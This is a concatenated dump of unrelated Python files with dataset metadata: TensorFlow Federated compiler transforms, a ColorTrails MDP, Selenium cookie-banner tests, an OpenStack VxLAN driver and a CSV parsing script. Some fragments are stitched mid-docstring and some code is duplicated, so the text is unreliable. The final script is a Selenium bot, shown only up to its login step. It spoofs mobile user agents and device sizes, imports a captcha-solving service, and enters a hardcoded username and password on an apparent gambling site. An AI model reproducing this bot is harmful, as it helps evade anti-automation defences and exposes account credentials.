    intrinsic_type = computation_types.FunctionType(parameter_type, result_type)
    intrinsic = computation_building_blocks.Intrinsic(first_comp.function.uri,
                                                      intrinsic_type)
    call = computation_building_blocks.Call(intrinsic, arg)
    # The merged intrinsic produces one federated value of tuples; unzip it
    # back into a tuple of federated values matching the original structure.
    tup = computation_constructing_utils.create_federated_unzip(call)
    names = [name for name, _ in named_comps]
    transformed_comp = computation_constructing_utils.create_named_tuple(
        tup, names)
    return transformed_comp, True

  return transformation_utils.transform_postorder(comp, _transform)
def remove_mapped_or_applied_identity(comp):
  r"""Removes all the mapped or applied identity functions in `comp`.

  This transform traverses `comp` postorder and replaces every computation of
  the form

    Intrinsic(<(x -> x), y>)

  where the intrinsic is `federated_map`, `federated_apply`, or
  `sequence_map`, with its argument:

    Comp(y)

  Args:
    comp: The computation building block in which to perform the removals.

  Returns:
    A new computation with the transformation applied or the original `comp`.

  Raises:
    TypeError: If types do not match.
  """
  py_typecheck.check_type(comp,
                          computation_building_blocks.ComputationBuildingBlock)
  map_like_uris = (
      intrinsic_defs.FEDERATED_MAP.uri,
      intrinsic_defs.FEDERATED_APPLY.uri,
      intrinsic_defs.SEQUENCE_MAP.uri,
  )

  def _is_mapped_identity(comp):
    """Returns `True` if `comp` maps or applies an identity function."""
    return (isinstance(comp, computation_building_blocks.Call) and
            isinstance(comp.function, computation_building_blocks.Intrinsic)
            and comp.function.uri in map_like_uris and
            _is_identity_function(comp.argument[0]))

  def _transform(comp):
    if _is_mapped_identity(comp):
      # Mapping identity is a no-op; keep only the mapped value.
      return comp.argument[1], True
    return comp, False

  return transformation_utils.transform_postorder(comp, _transform)
This transformation is used to facilitate the\n merging of TFF orchestration logic, in particular to remove unnecessary lambda\n expressions and as a stepping stone for merging Blocks together.\n\n Args:\n comp: The computation building block in which to perform the replacements.\n\n Returns:\n A new computation with the transformation applied or the original `comp`.\n\n Raises:\n TypeError: If types do not match.\n \"\"\"\n py_typecheck.check_type(comp,\n computation_building_blocks.ComputationBuildingBlock)\n\n def _should_transform(comp):\n return (isinstance(comp, computation_building_blocks.Call) and\n isinstance(comp.function, computation_building_blocks.Lambda))\n\n def _transform(comp):\n if not _should_transform(comp):\n return comp, False\n transformed_comp = computation_building_blocks.Block(\n [(comp.function.parameter_name, comp.argument)], comp.function.result)\n return transformed_comp, True\n\n return transformation_utils.transform_postorder(comp, _transform)\n\n\ndef replace_intrinsic_with_callable(comp, uri, body, context_stack):\n \"\"\"Replaces all the intrinsics with the given `uri` with a callable.\n\n This transform traverses `comp` postorder and replaces all the intrinsics with\n the given `uri` with a polymorphic callable that represents the body of the\n implementation of the intrinsic; i.e., one that given the parameter of the\n intrinsic constructs the intended result. 
This will typically be a Python\n function decorated with `@federated_computation` to make it into a polymorphic\n callable.\n\n Args:\n comp: The computation building block in which to perform the replacements.\n uri: The URI of the intrinsic to replace.\n body: A polymorphic callable.\n context_stack: The context stack to use.\n\n Returns:\n A new computation with the transformation applied or the original `comp`.\n\n Raises:\n TypeError: If types do not match.\n \"\"\"\n py_typecheck.check_type(comp,\n computation_building_blocks.ComputationBuildingBlock)\n py_typecheck.check_type(uri, six.string_types)\n py_typecheck.check_type(context_stack, context_stack_base.ContextStack)\n if not callable(body):\n raise TypeError('The body of the intrinsic must be a callable.')\n\n def _should_transform(comp):\n return (isinstance(comp, computation_building_blocks.Intrinsic) and\n comp.uri == uri and\n isinstance(comp.type_signature, computation_types.FunctionType))\n\n def _transform(comp):\n if not _should_transform(comp):\n return comp, False\n # We need 'wrapped_body' to accept exactly one argument.\n wrapped_body = lambda x: body(x) # pylint: disable=unnecessary-lambda\n transformed_comp = federated_computation_utils.zero_or_one_arg_fn_to_building_block(\n wrapped_body, 'arg', comp.type_signature.parameter, context_stack, uri)\n return transformed_comp, True\n\n return transformation_utils.transform_postorder(comp, _transform)\n\n\ndef replace_selection_from_tuple_with_element(comp):\n r\"\"\"Replaces any selection from a tuple with the underlying tuple element.\n\n Replaces any occurences of:\n\n Selection\n \\\n Tuple\n |\n [Comp, Comp, ...]\n\n with the appropriate Comp, as determined by the `index` or `name` of the\n `Selection`.\n\n Args:\n comp: The computation building block in which to perform the replacements.\n\n Returns:\n A possibly modified version of comp, without any occurrences of selections\n from tuples.\n\n Raises:\n TypeError: If `comp` is not an 
instance of\n `computation_building_blocks.ComputationBuildingBlock`.\n \"\"\"\n py_typecheck.check_type(comp,\n computation_building_blocks.ComputationBuildingBlock)\n\n def _should_transform(comp):\n return (isinstance(comp, computation_building_blocks.Selection) and\n isinstance(comp.source, computation_building_blocks.Tuple))\n\n def _get_index_from_name(selection_name, tuple_type_signature):\n named_type_signatures = anonymous_tuple.to_elements(tuple_type_signature)\n return [x[0] for x in named_type_signatures].index(selection_name)\n\n def _transform(comp):\n if not _should_transform(comp):\n return comp, False\n if comp.name is not None:\n index = _get_index_from_name(comp.name, comp.source.type_signature)\n else:\n index = comp.index\n return comp.source[index], True\n\n return transformation_utils.transform_postorder(comp, _transform)\n\n\ndef uniquify_compiled_computation_names(comp):\n \"\"\"Replaces all the compiled computations names in `comp` with unique names.\n\n This transform traverses `comp` postorder and replaces the name of all the\n comiled computations found in `comp` with a unique name.\n\n Args:\n comp: The computation building block in which to perform the replacements.\n\n Returns:\n A new computation with the transformation applied or the original `comp`.\n\n Raises:\n TypeError: If types do not match.\n \"\"\"\n py_typecheck.check_type(comp,\n computation_building_blocks.ComputationBuildingBlock)\n name_generator = computation_constructing_utils.unique_name_generator(\n None, prefix='')\n\n def _should_transform(comp):\n return isinstance(comp, computation_building_blocks.CompiledComputation)\n\n def _transform(comp):\n if not _should_transform(comp):\n return comp, False\n transformed_comp = computation_building_blocks.CompiledComputation(\n comp.proto, six.next(name_generator))\n return transformed_comp, True\n\n return transformation_utils.transform_postorder(comp, _transform)\n\n\ndef uniquify_reference_names(comp):\n 
\"\"\"Replaces all the reference names in `comp` with unique names.\n\n Args:\n comp: The computation building block in which to perform the replacements.\n\n Returns:\n Returns a transformed version of comp inside of which all variable names\n are guaranteed to be unique.\n \"\"\"\n py_typecheck.check_type(comp,\n computation_building_blocks.ComputationBuildingBlock)\n name_generator = computation_constructing_utils.unique_name_generator(None)\n\n class _RenameNode(transformation_utils.BoundVariableTracker):\n \"\"\"transformation_utils.SymbolTree node for renaming References in ASTs.\"\"\"\n\n def __init__(self, name, value):\n super(_RenameNode, self).__init__(name, value)\n py_typecheck.check_type(name, str)\n self.new_name = six.next(name_generator)\n\n def __str__(self):\n return 'Value: {}, name: {}, new_name: {}'.format(self.value, self.name,\n self.new_name)\n\n def _transform(comp, context_tree):\n \"\"\"Renames References in `comp` to unique names.\"\"\"\n if isinstance(comp, computation_building_blocks.Reference):\n new_name = context_tree.get_payload_with_name(comp.name).new_name\n return computation_building_blocks.Reference(new_name,\n comp.type_signature,\n comp.context), True\n elif isinstance(comp, computation_building_blocks.Block):\n new_locals = []\n for name, val in comp.locals:\n context_tree.walk_down_one_variable_binding()\n new_name = context_tree.get_payload_with_name(name).new_name\n new_locals.append((new_name, val))\n return computation_building_blocks.Block(new_locals, comp.result), True\n elif isinstance(comp, computation_building_blocks.Lambda):\n context_tree.walk_down_one_variable_binding()\n new_name = context_tree.get_payload_with_name(\n comp.parameter_name).new_name\n return computation_building_blocks.Lambda(new_name, comp.parameter_type,\n comp.result), True\n return comp, False\n\n symbol_tree = transformation_utils.SymbolTree(_RenameNode)\n return transformation_utils.transform_postorder_with_symbol_bindings(\n comp, 
class TFParser(object):
  """Callable taking subset of TFF AST constructs to CompiledComputations.

  When this function is applied via `transformation_utils.transform_postorder`
  to a TFF AST node satisfying its assumptions, the tree under this node will
  be reduced to a single instance of
  `computation_building_blocks.CompiledComputation` representing the same
  logic.

  Notice that this function is designed to be applied to what is essentially
  a subtree of a larger TFF AST; once the processing on a single device has
  been aligned at the AST level, and placement separated from the logic of
  this processing, we should be left with a function wrapped via
  `federated_map` or `federated_apply` to a federated argument. It is this
  function which we need to reduce to TensorFlow, and it is to the root
  node of this function which we are looking to apply `TFParser`. Because of
  this, we assume that there is a lambda expression at the top of the AST
  we are looking to parse, as well as the rest of the assumptions below.

  We have no proof that these assumptions are sufficient for this
  library to parse *all* TFF into TF, so we expect some constructs will fail
  to be reduced. The assumptions can currently be enumerated as follows:

  1. All called lambdas have been converted to blocks.
  2. All blocks have been inlined; that is, there are no block/LET constructs
     remaining.
  3. All compiled computations are called.
  4. No compiled computations have been partially called; we believe this
     should be handled correctly today but we haven't reasoned explicitly
     about this possibility.
  5. The only leaf nodes present under `comp` are compiled computations and
     references to the argument of the top-level lambda which we are hoping
     to replace with a compiled computation. Further, every leaf node which
     is a reference has as its parent a `computation_building_blocks.Call`,
     whose associated function is a TF graph. This prevents us from needing
     to deal with arbitrary nesting of references and TF graphs, and
     significantly clarifies the reasoning. This can be accomplished by
     "decorating" the appropriate leaves with called identity TF graphs, the
     construction of which is provided by a utility module.
  6. There is only a single lambda binding any references present in the AST,
     and it is placed at the root of the AST to which we apply `TFParser`.
  7. There are no intrinsics present in the AST.
  """

  # TODO(b/133328350): Allow for this to take in multiple selections from a
  # single argument.

  def __init__(self):
    """Populates the parser library with mutually exclusive options."""
    self._parse_library = [
        compiled_computation_transforms.SelectionFromCalledTensorFlowBlock(),
        compiled_computation_transforms.LambdaWrappingGraph(),
        compiled_computation_transforms.LambdaCallSelectionFromArg(),
        compiled_computation_transforms.LambdaToCalledTupleOfSelectionsFromArg(
        ),
        compiled_computation_transforms.TupleCalledGraphs(),
        compiled_computation_transforms.CalledCompositionOfTensorFlowBlocks(),
        compiled_computation_transforms.LambdaToCalledGraphOnReplicatedArg(),
    ]

  def __call__(self, comp):
    """Transforms `comp` by checking all elements of the parser library.

    This function is roughly performing intermediate-code generation, taking
    TFF and generating TF. Calling this function is essentially checking the
    stack and selecting a semantic action based on its contents, and *only
    one* of these actions should be selected for a given computation.

    Notice that since the parser library contains mutually exclusive options,
    it is safe to return early.

    Args:
      comp: The `computation_building_blocks.ComputationBuildingBlock` to
        check for possibility of reduction according to the parsing library.

    Returns:
      A tuple whose first element is a possibly transformed version of `comp`,
      and whose second is a Boolean indicating whether or not `comp` was
      transformed. This is in conforming to the conventions of
      `transformation_utils.transform_postorder`.
    """
    py_typecheck.check_type(
        comp, computation_building_blocks.ComputationBuildingBlock)
    # Options are mutually exclusive, so the first match wins.
    for option in self._parse_library:
      if option.should_transform(comp):
        transformed, ind = option.transform(comp)
        return transformed, ind
    return comp, False


def _is_called_intrinsic(comp, uri=None):
  """Returns `True` if `comp` is a called intrinsic with the `uri` or `uri`s.

            Call
           /
  Intrinsic

  Args:
    comp: The computation building block to test.
    uri: A uri or a list, tuple, or set of uri; or `None` to match a call to
      any intrinsic.
  """
  if isinstance(uri, six.string_types):
    uri = (uri,)
  if uri is not None:
    py_typecheck.check_type(uri, (list, tuple, set))
  return (isinstance(comp, computation_building_blocks.Call) and
          isinstance(comp.function, computation_building_blocks.Intrinsic) and
          (uri is None or comp.function.uri in uri))


def _is_identity_function(comp):
  """Returns `True` if `comp` is an identity function, i.e. `(x -> x)`."""
  return (isinstance(comp, computation_building_blocks.Lambda) and
          isinstance(comp.result, computation_building_blocks.Reference) and
          comp.parameter_name == comp.result.name)


def _check_has_unique_names(comp):
  # Guard used by transforms that move computations with unbound references;
  # such moves are only safe after reference names have been uniquified.
  if not transformation_utils.has_unique_names(comp):
    raise ValueError(
        'This transform should only be called after we have uniquified all '
        '`computation_building_blocks.Reference` names, since we may be moving '
        'computations with unbound references under constructs which bind '
        'those references.')
uniquified all '\n '`computation_building_blocks.Reference` names, since we may be moving '\n 'computations with unbound references under constructs which bind '\n 'those references.')\n\n\ndef _get_unbound_references(comp):\n \"\"\"Gets a Python `dict` of the unbound references in `comp`.\n\n Compuations that are equal will have the same collections of unbounded\n references, so it is safe to use `comp` as the key for this `dict` even though\n a given compuation may appear in many positions in the AST.\n\n Args:\n comp: The computation building block to parse.\n\n Returns:\n A Python `dict` of elements where keys are the compuations in `comp` and\n values are a Python `set` of the names of the unbound references in the\n subtree of that compuation.\n \"\"\"\n py_typecheck.check_type(comp,\n computation_building_blocks.ComputationBuildingBlock)\n references = {}\n\n def _update(comp):\n \"\"\"Updates the Python dict of references.\"\"\"\n if isinstance(comp, computation_building_blocks.Reference):\n references[comp] = set((comp.name,))\n elif isinstance(comp, computation_building_blocks.Block):\n references[comp] = set()\n names = []\n for name, variable in comp.locals:\n elements = references[variable]\n references[comp].update([e for e in elements if e not in names])\n names.append(name)\n elements = references[comp.result]\n references[comp].update([e for e in elements if e not in names])\n elif isinstance(comp, computation_building_blocks.Call):\n elements = references[comp.function]\n if comp.argument is not None:\n elements.update(references[comp.argument])\n references[comp] = elements\n elif isinstance(comp, computation_building_blocks.Lambda):\n elements = references[comp.result]\n references[comp] = set([e for e in elements if e != comp.parameter_name])\n elif isinstance(comp, computation_building_blocks.Selection):\n references[comp] = references[comp.source]\n elif isinstance(comp, computation_building_blocks.Tuple):\n elements = [references[e] for e in 
comp]\n references[comp] = set(itertools.chain.from_iterable(elements))\n else:\n references[comp] = set()\n return comp, False\n\n transformation_utils.transform_postorder(comp, _update)\n return references\n","sub_path":"tensorflow_federated/python/core/impl/transformations.py","file_name":"transformations.py","file_ext":"py","file_size_in_byte":47320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"282374725","text":"import numpy as np\nfrom model.coop_irl_mdp import CoopIRLMDP\nfrom collections import defaultdict\nimport json\n\n\nclass ColorTrails(CoopIRLMDP):\n action = {0: np.array([-1, 0]), # up\n 1: np.array([0, -1]), # left\n 2: np.array([0, 1]), # right\n 3: np.array([1, 0])} # down\n\n def __init__(self, ct_data):\n self.ct_data = ct_data\n self.t_map = defaultdict(lambda: defaultdict(dict))\n self.s_map = {}\n\n self.make_s_map_for_r(0, set(), self.s_map, self.t_map, ct_data.h_start, ct_data.r_start,\n ct_data.h_chip, ct_data.r_chip, 0)\n super().__init__(len(self.s_map) + 1, 5, 5, 2, 2)\n\n def valid_pos(self, pos):\n c = (pos >= np.array([0, 0])) * (pos < np.array(self.ct_data.shape))\n return np.prod(c)\n\n def make_s_map_for_r(self, s, medals, s_map, t_map, h_pos, r_pos, h_chip, r_chip, d):\n medals = medals.copy()\n if tuple(h_pos) in self.ct_data.medals:\n medals.add(self.ct_data.medals[tuple(h_pos)])\n if tuple(r_pos) in self.ct_data.medals:\n medals.add(self.ct_data.medals[tuple(r_pos)])\n\n bomb = -1\n if tuple(h_pos) in self.ct_data.bomb:\n bomb = self.ct_data.bomb[tuple(h_pos)]\n\n s_map[s] = (h_pos, r_pos, h_chip, r_chip, medals, self._finish_recipe(medals), bomb, d)\n s_offset = 0\n r_halt = True\n if tuple(r_pos) not in self.ct_data.medals:\n for a_r in range(4):\n n_r_pos = r_pos + ColorTrails.action[a_r]\n if not self.valid_pos(n_r_pos):\n continue\n chip = self.ct_data.color[n_r_pos[0], n_r_pos[1]]\n if r_chip[chip] <= 0:\n continue\n r_halt = False\n n_r_chip = r_chip.copy()\n 
n_r_chip[chip] -= 1\n s_offset += self.make_s_map_for_h(s, medals, a_r, s_offset, s_map, t_map,\n h_pos, n_r_pos, h_chip, n_r_chip, d)\n if r_halt:\n s_offset += self.make_s_map_for_h(s, medals, 4, s_offset, s_map, t_map,\n h_pos, r_pos, h_chip, r_chip, d)\n\n return s_offset\n\n def make_s_map_for_h(self, s, medals, a_r, s_offset, s_map, t_map,\n h_pos, n_r_pos, h_chip, n_r_chip, d):\n h_halt = True\n s_h_offset = 0\n if tuple(h_pos) not in self.ct_data.medals:\n for a_h in range(4):\n n_h_pos = h_pos + ColorTrails.action[a_h]\n if not self.valid_pos(n_h_pos):\n continue\n chip = self.ct_data.color[n_h_pos[0], n_h_pos[1]]\n if h_chip[chip] <= 0:\n continue\n h_halt = False\n n_h_chip = h_chip.copy()\n n_h_chip[chip] -= 1\n s_h_offset += 1\n\n # t_map[s].append((a_h, a_r, s + s_offset + s_h_offset))\n t_map[s][a_h][a_r] = s + s_offset + s_h_offset\n s_h_offset += self.make_s_map_for_r(s + s_offset + s_h_offset, medals, s_map, t_map,\n n_h_pos, n_r_pos, n_h_chip, n_r_chip, d + 1)\n if h_halt and a_r != 4:\n s_h_offset += 1\n t_map[s][4][a_r] = s + s_offset + s_h_offset\n s_h_offset += self.make_s_map_for_r(s + s_offset + s_h_offset, medals, s_map, t_map,\n h_pos, n_r_pos, h_chip, n_r_chip, d + 1)\n return s_h_offset\n\n def _finish_recipe(self, medals):\n recipe = set()\n for i, rs in enumerate(self.ct_data.recipe):\n for r in rs:\n if r.issubset(medals):\n recipe.add(i)\n break\n return recipe\n\n def _set_tro(self):\n for s, v in self.t_map.items():\n for a_h in range(5):\n if a_h not in v:\n self.t[:, a_h, s, -1] = 1\n self.r[:, a_h, s, :, :] = -1000\n else:\n for a_r in range(5):\n if a_r not in v[a_h]:\n self.t[a_r, a_h, s, -1] = 1\n self.r[a_r, a_h, s, :, :] = -1000\n else:\n ns = v[a_h][a_r]\n self.t[a_r, a_h, s, ns] = 1\n self.r[a_r, a_h, s, :, :] -= self.calc_cost(a_h, a_r)\n s_data = self.s_map[s]\n ns_data = self.s_map[ns]\n for recipe in ns_data[5]:\n if recipe not in s_data[5]:\n self.r[a_r, a_h, s, :, recipe] += 300\n if ns_data[6] != -1:\n self.r[a_r, 
a_h, s, ns_data[6], :] -= 100\n for s in self.s_map.keys():\n if s not in self.t_map:\n self.t[:, :, s, -1] = 1\n self.r[:-1, :, s, :] = -1000\n self.r[:, :-1, s, :] = -1000\n self.t[:, :, -1, -1] = 1\n\n # for k, v in self.s_map.items():\n # print(k, v)\n # # exit()\n #\n # for k, v in self.t_map.items():\n # print(k, v)\n # exit()\n\n def calc_cost(self, a_h, a_r):\n return (int(a_h != 4) + int(a_r != 4)) * 5\n\n def make_data(self):\n # medals = {v: k for k, v in self.ct_data.medals.items()}\n medals = np.zeros_like(self.ct_data.color)\n for k, v in self.ct_data.medals.items():\n medals[k] = v + 1\n bomb = np.zeros_like(self.ct_data.color)\n for k, v in self.ct_data.bomb.items():\n bomb[k] = v + 1\n recipe = [[list(r) for r in rs] for rs in self.ct_data.recipe]\n data = {\n \"color\": self.ct_data.color.tolist(),\n \"bomb\": bomb.tolist(),\n \"medals\": medals.tolist(),\n \"h_chip\": self.ct_data.h_chip.tolist(),\n \"r_chip\": self.ct_data.r_chip.tolist(),\n \"recipe\": recipe,\n \"h_start\": self.ct_data.h_start.tolist(),\n \"r_start\": self.ct_data.r_start.tolist(),\n }\n json.dump(data, open(\"ct_data/data_\" + str(self.ct_data.index) + \".json\", \"w\"), indent=4)\n\n def make_scinario(self, th_r, index, algo, target):\n conv_action = {0: 2, 1: 1, 2: 4, 3: 3, 4: 0}\n s_candi = set([0])\n b_map = {0: np.array([0.5, 0.5])}\n actions = {}\n nexts = {}\n while len(s_candi) > 0:\n s = s_candi.pop()\n b = b_map[s]\n a_r = self.a_vector_a[s][th_r]\n # print(a_r)\n # return np.max(np.dot(self.a_vector_a[s][th_r][a_r], b))\n # print(s, [np.dot(b, v.T)[0][0] for _k, v in sorted(a_r.items())])\n # print(s, [v for _k, v in sorted(a_r.items())])\n # print(s, [np.max(np.dot(b, v.T)) for _k, v in sorted(a_r.items())])\n # exit()\n # print(s, [np.dot(b, v.T) for _k, v in sorted(a_r.items())])\n # print(s, np.max(np.dot(b, v.T)[0])[0] for _k, v in sorted(a_r.items())])\n a_r = np.argmax([np.max(np.dot(b, v.T)) for _k, v in sorted(a_r.items())])\n\n # print(s, a_r)\n next = 
{}\n for a_h, v in self.t_map[s].items():\n n_s = v[a_r]\n b = self.h_pi[th_r][s][a_r][a_h] * b_map[s]\n b /= np.sum(b)\n b_map[n_s] = np.array(b)\n next[conv_action[a_h]] = n_s\n s_candi.add(n_s)\n if len(next) > 0:\n nexts[s] = next\n actions[s] = int(conv_action[a_r])\n # print(actions)\n json.dump({\"actions\": actions, \"nexts\": nexts, \"target\": target},\n open(\"ct_data/scinario_\" + str(index) + \"_\" + str(algo) + \".json\", \"w\"), indent=4)\n # json.dump(actions, open(\"ct_data/scinario_\" + str(index) + \"_\" + str(algo) + \".json\", \"w\"), indent=4)\n\n # print(b)\n # print(self.h_pi[th_r][s][a_r])\n\n def _take_one_turn(self):\n exit()\n\n\n\n","sub_path":"problem/ct/ct_data_mdp.py","file_name":"ct_data_mdp.py","file_ext":"py","file_size_in_byte":8156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"239040699","text":"from selenium.common.exceptions import NoSuchElementException\nimport pytest\nimport time\n\n\n@pytest.fixture\ndef selenium(selenium):\n selenium.implicitly_wait(10)\n selenium.maximize_window()\n return selenium\n\n\ndef test_banner_shows_and_hides(selenium, live_server):\n selenium.get(live_server.url)\n cookielaw_banner = selenium.find_element_by_id('CookielawBanner')\n\n # on click of the button, cookie set and banner hidden\n cookielaw_banner.find_element_by_class_name('btn').click()\n assert not cookielaw_banner.is_displayed()\n assert '1' == selenium.get_cookie('cookielaw_accepted')['value']\n\n # on come back, assert banner gone\n selenium.get(live_server.url)\n\n with pytest.raises(NoSuchElementException):\n selenium.find_element_by_id('CookielawBanner')\n\n\ndef test_banner_shows_and_hides_with_jquery(selenium, live_server):\n # now, with jQuery\n selenium.get('{}/?jquery=1'.format(live_server.url))\n cookielaw_banner = selenium.find_element_by_id('CookielawBanner')\n\n # on click of the button, cookie set and banner hidden\n 
cookielaw_banner.find_element_by_class_name('btn').click()\n time.sleep(1)\n assert not cookielaw_banner.is_displayed()\n assert '1' == selenium.get_cookie('cookielaw_accepted')['value']\n","sub_path":"tests/test_functional.py","file_name":"test_functional.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"344088795","text":"# uncompyle6 version 3.6.7\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: build/bdist.linux-x86_64/egg/cecdaemon/__main__.py\n# Compiled at: 2018-09-22 03:14:19\n# Size of source mod 2**32: 121 bytes\n__doc__ = ' Main entry point\\n'\nfrom . import cecdaemon\n\ndef main():\n cecdaemon.run()\n\n\nif __name__ == '__main__':\n main()","sub_path":"pycfiles/cechmate-0.0.8-py3-none-any/__main__.cpython-37.py","file_name":"__main__.cpython-37.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"519703938","text":"# Copyright 2017 Huawei Technologies Co., Ltd.\n# All Rights Reserved\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom oslo_config import cfg\nfrom oslo_log import log\n\nfrom neutron.plugins.ml2 import driver_api\nfrom neutron.plugins.ml2.drivers import type_vxlan\nfrom neutron_lib import exceptions as n_exc\n\nfrom tricircle.common import constants\n\nLOG = log.getLogger(__name__)\n\n\nclass VxLANTypeDriver(type_vxlan.VxlanTypeDriver):\n def __init__(self):\n super(VxLANTypeDriver, self).__init__()\n\n def get_type(self):\n return constants.NT_VxLAN\n\n def initialize(self):\n try:\n self._initialize(cfg.CONF.tricircle.vni_ranges)\n except n_exc.NetworkTunnelRangeError:\n LOG.exception(\"Failed to parse vni_ranges. \"\n \"Service terminated!\")\n raise SystemExit()\n\n def reserve_provider_segment(self, context, segment):\n res = super(VxLANTypeDriver,\n self).reserve_provider_segment(context, segment)\n res[driver_api.NETWORK_TYPE] = constants.NT_VxLAN\n return res\n\n def allocate_tenant_segment(self, context):\n res = super(VxLANTypeDriver,\n self).allocate_tenant_segment(context)\n res[driver_api.NETWORK_TYPE] = constants.NT_VxLAN\n return res\n\n def get_mtu(self, physical_network=None):\n pass\n","sub_path":"tricircle/network/drivers/type_vxlan.py","file_name":"type_vxlan.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"177671300","text":"import numpy as np\nimport json\nimport csv\nfrom itertools import izip\n\nfilename = open('data/processed.json')\ndata = json.load(filename)\n\ntitle = []\nkeywords = []\nwinner = []\n\nstr1 = \"\"\nfor i in data:\n if i['winner'] == True:\n str1 += 'True'+';'\n winner.append(str1)\n else:\n str1 += 'False'+';'\n winner.append(str1)\n str1=\"\"\n\nstr1 = \"\"\nfor i in data:\n if \"keywords\" in i:\n for x in i[\"keywords\"]:\n str1 += x[\"text\"]+\" \"\n keywords.append(str1)\n str1 = \"\"\n\nstr1 = \"\"\nfor i in data:\n str1 
+= i[\"tagline\"]+';'\n title.append(str1)\n str1=\"\"\n\nfo = open('cluster.csv','w')\nwith open('cluster.csv','w') as outcsv:\n writer= csv.writer(outcsv, delimiter =';')\n writer.writerows(izip(winner,title,keywords))\nfo.close()\n\n","sub_path":"cluster_parsing.py","file_name":"cluster_parsing.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"617604842","text":"# encoding: utf-8\n\nfrom selenium import webdriver\nimport time\nfrom PIL import ImageGrab\nfrom chaojiying import Chaojiying_Client\nimport random\nfrom config_data import deviceall\nimport requests\nimport re\nimport urllib.request\nimport base64\nfrom urllib import request,parse\nimport json\n\n\nclass filter():\n sign_up = 'https://890cp2.com/'\n def device_ua(self):\n ua_iphone = []\n ua_ipad = []\n with open(\"ua_iphone.txt\", 'r') as f:\n for line in f:\n # uaph = f.readline()\n line = line.strip().split('\\n')\n # print(line)\n ua_iphone.append(line[0])\n # print(ua_iphone)\n\n with open(\"ua_ipad.txt\", 'r') as a:\n for line in a:\n line = line.strip().split('\\n')\n ua_ipad.append(line[0])\n # print(ua_all)\n\n ua_ph = 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_1_1 like Mac OS X; tr-TR) AppleWebKit/537.36 (KHTML, like Gecko) Version/10.1.1 Mobile/14B100 Safari/537.36 Puffin/5.2.0IP'\n ua_pa = random.choice(ua_ipad)\n\n xypad = {'x': 720, 'y': 475} # ipad(720,475,205,40)\n xypadp = {'x': 915, 'y': 475} # ipadpro(915,475,205,40)\n xy678 = {'x': 315, 'y': 430} # iphone6_7_8(320,475,205,40)\n xyx = {'x': 320, 'y': 430} # iphoneX(320,475,205,40)\n xy5 = {'x': 252, 'y': 430} # iphone5_se(235,510,205,40)\n xy678p = {'x': 375, 'y': 430} # iphone6_7_8plus(375,470,205,40)\n\n iphone5_se = {'width': 320, 'height': 568, 'ua': ua_ph, 'xy': xy5}\n iphone6_7_8 = {'width': 375, 'height': 667, 'ua': ua_ph, 'xy': xy678}\n iphone6_7_8plus = {'width': 414, 'height': 736, 'ua': ua_ph, 'xy': xy678p}\n iphoneX = {'width': 
375, 'height': 812, 'ua': ua_ph, 'xy': xyx}\n ipad = {'width': 768, 'height': 1024, 'ua': ua_pa, 'xy': xypad}\n ipadPro = {'width': 1024, 'height': 1366, 'ua': ua_pa, 'xy': xypadp}\n\n deviceall = [iphone5_se, iphone6_7_8, iphone6_7_8plus, iphoneX, ipad,ipadPro] #\n\n return deviceall\n\n def setUp(self):\n device_all = self.device_ua()\n # self.device = random.choice(device_all)\n self.device = device_all[2]\n print(self.device)\n pixel_ratio = 3.0\n mobileEmulation = {\"deviceMetrics\": {\"width\": self.device['width'], \"height\": self.device['height'], \"pixelRatio\": pixel_ratio},\"userAgent\": self.device['ua']}\n options = webdriver.ChromeOptions()\n options.binary_location = \"C:/Users/moxi/Desktop/mychrome/Chrome/chrome.exe\"\n chrome_driver_binary = \"chromedriver.exe\"\n options.add_experimental_option('mobileEmulation', mobileEmulation)\n # self.driver = webdriver.Chrome(executable_path='chromedriver.exe', chrome_options=options)\n self.driver = webdriver.Chrome(chrome_driver_binary, options=options)\n self.driver.maximize_window()\n time.sleep(1)\n self.driver.get(self.sign_up)\n self.driver.implicitly_wait(30)\n\n def quit(self):\n self.driver.quit()\n\n def verify(self):\n for i in range(1, 3):\n time.sleep(2)\n self.driver.find_elements_by_class_name(\"am-modal-button\")[0].click()\n # self.driver.find_element_by_xpath('//div[@class=\"am-modal-button-group-h.am-modal-button-group-normal\"]/a').click()\n # self.driver.refresh()\n time.sleep(5)\n self.driver.find_elements_by_class_name(\"barTextButton___G3WVC\")[1].click()\n # self.driver.switch_to.frame(self.driver.find_element_by_xpath(\"//iframe[contains(@src,'/login')]\"))\n\n username =\"ti626\"\n pwd = \"zspQjn0d5Z\"\n print(\"User:\"+username)\n print(\"Pwd:\"+pwd)\n\n # user = self.driver.find_element_by_xpath('//input[@placeholder=\"请输入用户名\"]')\n user = self.driver.find_elements_by_xpath('//input[@type=\"text\"]')[0]\n time.sleep(2)\n user.clear()\n time.sleep(2)\n user.send_keys(username)\n 
